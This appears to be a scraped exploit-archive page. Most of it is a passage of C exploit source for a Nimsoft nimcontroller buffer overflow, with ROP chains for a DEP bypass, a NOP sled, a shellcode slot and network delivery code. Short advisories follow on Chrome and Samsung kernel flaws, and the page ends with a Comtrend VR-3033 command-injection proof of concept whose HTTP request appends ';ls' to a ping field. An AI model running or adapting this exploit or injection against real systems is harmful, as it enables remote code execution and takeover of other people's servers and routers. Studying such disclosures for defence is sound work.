printf("%s Exploit has not been tested against target buildn", PE);
exit(-1);
} else
printf("%s Nimbus build appears to be exploitablen", PI);

return 0;
}

int check_version(char *rhost, int rport)
{
int c;
int sock;
int count;
NimsoftProbe *probe;
char response[BUFSIZ];
struct sockaddr_in srv;
char *get_operating_sys[] = { "get_info", "interfaces=0" };

probe = packet_gen(get_operating_sys, 2, 0);

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
return -1;

srv.sin_addr.s_addr = inet_addr(rhost);
srv.sin_port = htons(rport);
srv.sin_family = AF_INET;

if (connect(sock , (struct sockaddr *)&srv, sizeof(srv)) < 0)
return -1;

printf("%s Sending get_info probe to %s:%dn", PI, rhost, rport);

send(sock, probe->packet, probe->length, 0);
count = read(sock, response, BUFSIZ);

if ((parse_response(response, count) != 0)) {
printf("%s Probe failed, unable to parse packetn", PE);
exit(-1);
}

free(probe);
close(sock);

return 0;
}

/*****************************************************************************************************************
* This chain will re-align RSP / Stack, it MUST be a multiple of 16 bytes otherwise our call will fail. *
* I had VP work 50% of the time when the stack was unaligned. *
*****************************************************************************************************************/
int64_t rsp_alignment_rop_gadgets[] = {

[0 ... 19] = 0x0000000140018c42, // ret (20 ROP NOPS)
0x0000000140002ef6, // pop rax ; ret
0x00000001401a3000, // *ptr to handle reference ( MEM_COMMIT | PAGE_READWRITE | MEM_IMAGE )
0x00000001400af237, // pop rdi ; ret
0x0000000000000007, // alignment for rsp
0x0000000140025dab, // add esp, edi ; adc byte [rax], al ; add rsp, 0x0000000000000278 ; ret
};

/*****************************************************************************************************************
* This chain will craft function calls to GetModuleHandleA, GetProcAddressStub, and finally VirtualProtectStub. *
* Once completed, we have bypassed DEP and can get code execution. Since VirtualProtectStub is auto generated, *
* we needn't worry about other Windows OS's. *
*****************************************************************************************************************/
int64_t dep_bypass_rop_gadgets[] = {

// RAX -> HMODULE GetModuleHandleA(
// ( RCX == *module ) LPCSTR lpModuleName,
// );
[0 ... 14] = 0x0000000140018c42, // ret (15 ROP NOPS)
0x0000000140002ef6, // pop rax ; ret
0x0000000000000000, // (zero out rax)
0x00000001400eade1, // mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
[24 ... 33] = 0x0000000140018c42, // ret (10 ROP NOPS)
0x0000000140131643, // pop rcx ; ret
0x00000000000009dd, // offset to "kernel32.dll"
0x000000014006d8d8, // add rax, rcx ; add rsp, 0x38 ; ret
[37 ... 51] = 0x0000000140018c42, // ret (15 ROP NOPS)
0x00000001400b741b, // xchg eax, ecx ; ret
0x0000000140002ef6, // pop rax ; ret
0x000000014015e310, // GetModuleHandleA (0x00000000014015E330-20)
0x00000001400d1161, // call qword ptr [rax+20] ; add rsp, 0x40 ; pop rbx ; ret
[56 ... 72] = 0x0000000140018c42, // ret (17 ROP NOPS)

// RAX -> FARPROC GetProcAddressStub(
// ( RCX == &addr ) HMODULE hModule,
// ( RDX == *module ) lpProcName
// );
0x0000000140111c09, // xchg rax, r11 ; or al, 0x00 ; ret (backup &hModule)
0x0000000140002ef6, // pop rax ; ret
0x0000000000000000, // (zero out rax)
0x00000001400eade1, // mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
[83 ... 92] = 0x0000000140018c42, // ret (10 ROP NOPS)
0x0000000140131643, // pop rcx ; ret
0x0000000000000812, // offset to "virtualprotectstub"
0x000000014006d8d8, // add rax, rcx ; add rsp, 0x38 ; ret
[96 ... 110] = 0x0000000140018c42, // ret (15 ROP NOPS)
0x0000000140135e39, // mov edx,eax ; mov rbx,qword [rsp+0x30] ; mov rbp,qword [rsp+0x38] ; mov rsi,qword [rsp+0x40] ; mov rdi,qword [rsp+0x48] ; mov eax,edx ; add rsp,0x20 ; pop r12; ret
[112 ... 121] = 0x0000000140018c42, // ret (10 ROP NOPS)
0x00000001400d1ab8, // mov rax, r11 ; add rsp, 0x30 ; pop rdi ; ret
[123 ... 132] = 0x0000000140018c42, // ret (10 ROP NOPS)
0x0000000140111ca1, // xchg rax, r13 ; or al, 0x00 ; ret
0x00000001400cf3d5, // mov rcx, r13 ; mov r13, qword [rsp+0x50] ; shr rsi, cl ; mov rax, rsi ; add rsp, 0x20 ; pop rdi ; pop rsi ; pop rbp ; ret
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
[138 ... 143] = 0x0000000140018c42, // ret
0x0000000140002ef6, // pop rax ; ret
0x000000014015e318, // GetProcAddressStub (0x00000000014015e338-20)
0x00000001400d1161, // call qword ptr [rax+20] ; add rsp, 0x40 ; pop rbx ; ret
[147 ... 163] = 0x0000000140018c42, // ret (17 ROP NOPS)

// RAX -> BOOL VirtualProtectStub(
// ( RCX == *shellcode ) LPVOID lpAddress,
// ( RDX == len(shellcode) ) SIZE_T dwSize,
// ( R8 == 0x0000000000000040 ) DWORD flNewProtect,
// ( R9 == *writeable location ) PDWORD lpflOldProtect,
// );
0x0000000140111c09, // xchg rax, r11 ; or al, 0x00 ; ret (backup *VirtualProtectStub)
0x000000014013d651, // pop r12 ; ret
0x00000001401fb000, // *writeable location ( MEM_COMMIT | PAGE_READWRITE | MEM_IMAGE )
0x00000001400eba74, // or r9, r12 ; mov rax, r9 ; mov rbx, qword [rsp+0x50] ; mov rbp, qword [rsp+0x58] ; add rsp, 0x20 ; pop r12 ; pop rdi ; pop rsi ; ret
[168 ... 177] = 0x0000000140018c42, // ret (10 ROP NOPS)
0x0000000140002ef6, // pop rax ; ret
0x0000000000000000, //
0x00000001400eade1, // mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
[187 ... 196] = 0x0000000140018c42, // ret (10 ROP NOPS)
0x0000000140131643, // pop rcx ; ret
0x000000000000059f, // (offset to *shellcode)
0x000000014006d8d8, // add rax, rcx ; add rsp, 0x38 ; ret
[200 ... 214] = 0x0000000140018c42, // ret (15 ROP NOPS)
0x00000001400b741b, // xchg eax, ecx ; ret
0x00000001400496a2, // pop rdx ; ret
0x00000000000005dc, // dwSize
0x00000001400bc39c, // pop r8 ; ret
0x0000000000000040, // flNewProtect
0x00000001400c5f8a, // mov rax, r11 ; add rsp, 0x38 ; ret (RESTORE VirtualProtectStub)
[221 ... 237] = 0x0000000140018c42, // ret (17 ROP NOPS)
0x00000001400a0b55, // call rax ; mov rdp qword ptr [rsp+48h] ; mov rsi, qword ptr [rsp+50h] ; mov rax, rbx ; mov rbx, qword ptr [rsp + 40h] ; add rsp,30h ; pop rdi ; ret
[239 ... 258] = 0x0000000140018c42, // ret (20 ROP NOPS)
0x0000000140002ef6, // pop rax ; ret (CALL COMPLETE, "JUMP" INTO OUR SHELLCODE)
0x0000000000000000, // (zero out rax)
0x00000001400eade1, // mov eax, esp ; add rsp, 0x30 ; pop r13 ; pop r12 ; pop rbp ; ret
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
0x0000000000000000, //
[268 ... 277] = 0x0000000140018c42, // ret (10 ROP NOPS)
0x0000000140131643, // pop rcx ; ret
0x0000000000000317, // (offset to our shellcode)
0x000000014006d8d8, // add rax, rcx ; add rsp, 0x38 ; ret
[281 ... 295] = 0x0000000140018c42, // ret (15 ROP NOPS)
0x00000001400a9747, // jmp rax
[297 ... 316] = 0x0000000140018c42, // ret (do not remove)
};

/********************************************************************************************************************
* *
* int generate_rop_chain(unsigned char *buffer, int gadgets, int64_t rop_gadgets[]): *
* *
* This function will generate a rop chain and store it in the buffer passed as the first argument. The return *
* value will contain the final ROP chain size. *
* *
********************************************************************************************************************/

#define RSP_ROP (sizeof(rsp_alignment_rop_gadgets)/sizeof(int64_t))
#define DEP_ROP (sizeof(dep_bypass_rop_gadgets) / sizeof(int64_t))

int generate_rop_chain(unsigned char *buffer, int gadgets, int64_t rop_gadgets[])
{
int i, j, k;
int chain_size = 0;

for (i = 0; i < gadgets; i++)
for (j = 0, k = 0; j < sizeof(rop_gadgets[i]); j++)
{
*buffer++ = ((rop_gadgets[i]>>k)&0xff);
chain_size++;
k += 8;
}

return chain_size;
}

#define MAX_EXPLOIT_BUFFER 9000

unsigned char *generate_exploit_buffer(unsigned char *buffer)
{
int r1, r2, c;
char rop_chain[20000];
unsigned char *heapflip = "x3dxfdx06x40x01x00x00x00";

memset(buffer , 0x41, 1000); // Offset
memset(buffer+1000, 0x0F, 33);
memcpy(buffer+1033, heapflip, 8); // HeapFlip - pop rsp ; or al, 0x00 ; add rsp, 0x0000000000000448 ; ret
memset(buffer+1041, 0x41, 7); // Adjustment for the initial chain

/* generate the first rop chain to perform stack alignment */
r1 = generate_rop_chain(rop_chain, RSP_ROP, rsp_alignment_rop_gadgets);
memcpy(buffer+1048, rop_chain, r1);
c = r1 + 1048;

/* adjust for second stage */
memset(buffer+c, 0x57, 631);
c += 631;

/* generate the second rop chain to perform DEP bypass */
r2 = generate_rop_chain(rop_chain, DEP_ROP, dep_bypass_rop_gadgets);
memcpy(buffer+c, rop_chain, r2);
c += r2;

/* ROP CHAIN MUST BE 3500 BYTES OR EXPLOITATION WILL FAIL */
memset(buffer+c, 0x45, (3500 - (r1 + r2 + 631)));
c += (3500 - (r1 + r2 + 631));

memcpy(buffer+c, "kernel32.dllx00", 13);
c += 13;

memcpy(buffer+c, "VirtualProtectx00", 15);
c += 15;

/* NOPS */
memset(buffer+c, 0x90, 500);
c += 500;

/* shellcode */
memcpy(buffer+c, shellcode, (sizeof(shellcode)-1));
c += (sizeof(shellcode)-1);

/* filler */
memset(buffer+c, 0x10, (8000 - c));

return buffer;
}

#define MAX_ARGUMENTS 5

void help()
{
printf("usage: ./singAboutMeImDyingOfThirst [-h] [-t TARGET] [-p PORT] [ARG=VAL]nn");
printf("Sing About Me Im Dying Of Thirst - A nimcontroller's worst nightmarenn");
printf("optional arguments:n");
printf(" -h, --help show this help message and exitn");
printf(" -t TARGET, --target TARGET target host to proben");
printf(" -p PORT, --port PORT nimcontroller portnn");
printf("examples:n");
printf(" ./singAboutMeImDyingOfThirst -t 192.168.88.130 -p 48000n");
exit(0);
}

int main(int argc, char **argv)
{
int c;
int sock;
int rport;
NimsoftProbe *probe;
struct sockaddr_in srv;
char *rhost, *port;
char *params[MAX_ARGUMENTS];
unsigned char *exploit_buff;
unsigned char buffer[MAX_EXPLOIT_BUFFER];
unsigned char final_buffer[MAX_EXPLOIT_BUFFER] = "directory=";

char *exploit[] = { "directory_list", final_buffer };

while (1)
{
static struct option long_options[] =
{
{"help", no_argument, 0, 'h'},
{"target", required_argument, 0, 't'},
{"port", required_argument, 0, 'p'},
{0, 0, 0}
};

int option_index = 0;

c = getopt_long (argc, argv, "ht:p:", long_options, &option_index);

if (c == -1)
break;

switch(c)
{
case 't':
rhost = optarg;
break;
case 'p':
port = optarg;
break;
case 'h':
default:
help();
break;
}
}

if (argc < 5)
help();

rport = atoi(port);

if (check_version(rhost, rport) != 0) {
printf("%s Failed to connect to target hostn", PE);
exit(-1);
}

if (check_vulnerability(rhost, rport) != 0) {
printf("%s Target failed vulnerability testsn", PE);
exit(-1);
}

printf("%s Generating evil nimbus probe, we're watchingn", PI);
exploit_buff = generate_exploit_buffer(buffer);
memcpy(final_buffer+10, exploit_buff, 8000);
probe = packet_gen(exploit, 2, 8000);

printf("%s Sending evil buffer, R.I.P RIP - wetw0rkn", PG);

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
return -1;

srv.sin_addr.s_addr = inet_addr(rhost);
srv.sin_port = htons(rport);
srv.sin_family = AF_INET;

if (connect(sock , (struct sockaddr *)&srv, sizeof(srv)) < 0)
return -1;

send(sock, probe->packet, probe->length, 0);

free(probe);
close(sock);
}

Source

image
This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory. The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode. The payload is executed within the sandboxed renderer process, so the browser must be run with the –no-sandbox option for the payload to work…

Source

Chrome suffers from a heap use-after-free vulnerability in DesktopMediaPickerController::WebContentsDestroyed.

MD5 | 696153f1a945a02c625d23a13667f869

Source

This function, reached through ioctl VS4L_VERTEXIOC_QBUF in the Samsung kernel, has an error case that cannot function correctly. It reads in an array of pointers from userspace and in-place replaces each userspace pointer with a kernel pointer allocated with kzalloc(). Unfortunately, in the error case it will iterate over all the pointers in the array (regardless of how many, if any, were converted to kernel pointers) and call kfree() on each of them. Thus, all it takes to call kfree() on an arbitrary number of controlled pointers is to make the second copy_from_user() fail after successfully copying in the desired number of pointers to free.

MD5 | 05651491fa9a6c8a32c0a6dc538ee2f3

Source

In the Samsung kernel, the /dev/hdcp2 device ioctls seem to implement no locking, leading to multiple exploitable race conditions. For example, you can open a session with the HDCP_IOC_SESSION_OPEN ioctl, and then close it in multiple threads in parallel with the HDCP_IOC_SESSION_CLOSE. Since no locking is implemented in hdcp_session_close(), memory will be corrupted and the system will become unstable.

MD5 | d4c16edeb7e9bb6b2a66c4a9bfe48796

Source

The function __vipx_ioctl_put_container() in the Samsung kernel calls copy_to_user() on a vs4l_container_list structure that contains a kernel pointer, exposing that kernel pointer to userspace just before it gets passed to kfree().

MD5 | 4d763dd7a0edc38113e6a84e2a16619c

Source

Comtrend VR-3033 suffers from a command injection vulnerability.

MD5 | 1068034443ae0a1d32707c90982e884d

##Timeline :
*Bug sent to vendor : 17-02-2020
*No Response after 10 days
* Public disclosure: 27-02-020

The Comtrend VR-3033 is prone to Multiple Authenticated Command Injection
vulnerability via ping and traceroute diagnostic page.
Remote attackers are able to get full control and compromise the network
managed by the router.

Note : The same bug may exist in other Comtrend routers .
===============================================
Product Page :
https://us.comtrend.com/products/vr-3030/

Firmware version :
DE11-416SSG-C01_R02.A2pvI042j1.d26m

Bootloader (CFE) Version :
1.0.38-116.228-1

To reproduce the vulnerability attacker has to access the interface at
least with minimum privilege.

1- Open interface
2- click on 'Diagnostic' tab on top.
3- click then on 'Ping' or traceroute
4- on the text input, type 'google.fr;ls - l'
5 - a list of folder names should appear.
#############################
POC session Logs :

GET /ping.cgi?pingIpAddress=google.fr;ls&sessionKey=1039230114 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:73.0)
Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/
webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic dXNlcjp1c2Vy
Connection: close
Referer: http://192.168.0.1/pingview.cmd
Upgrade-Insecure-Requests: 1



=====================++RESPONSE++=====================

HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Fri, 02 Jan 1970 00:00:26 GMT
Content-Type: text/html
Connection: close








<!-- hide

function btnPing() {
var loc = 'ping.cgi?';

with ( document.forms[0] ) {
if (pingIpAddress.value.length == 0 ) {
return;

}

loc += 'pingIpAddress=' + pingIpAddress.value;
loc += '&sessionKey=1592764063';
}

var code = 'location="' + loc + '"';
eval(code);
}

// done hiding -->






Ping 


Send ICMP ECHO_REQUEST packets to network hosts.






Ping IP Address / Hostname:<input type='text' name='pingIpAddress'
onkeydown="if(event.keyCode == 13){event.returnValue = false;}">



bin




bootfs




data




debug




dev




etc




lib




linuxrc




mnt




opt




proc




sbin




sys




tmp




usr




var




webs








##Same bug with the same way we exploited in ping function can be exploited
the same way in traceroute function.
Author : Raki Ben Hamouda

Source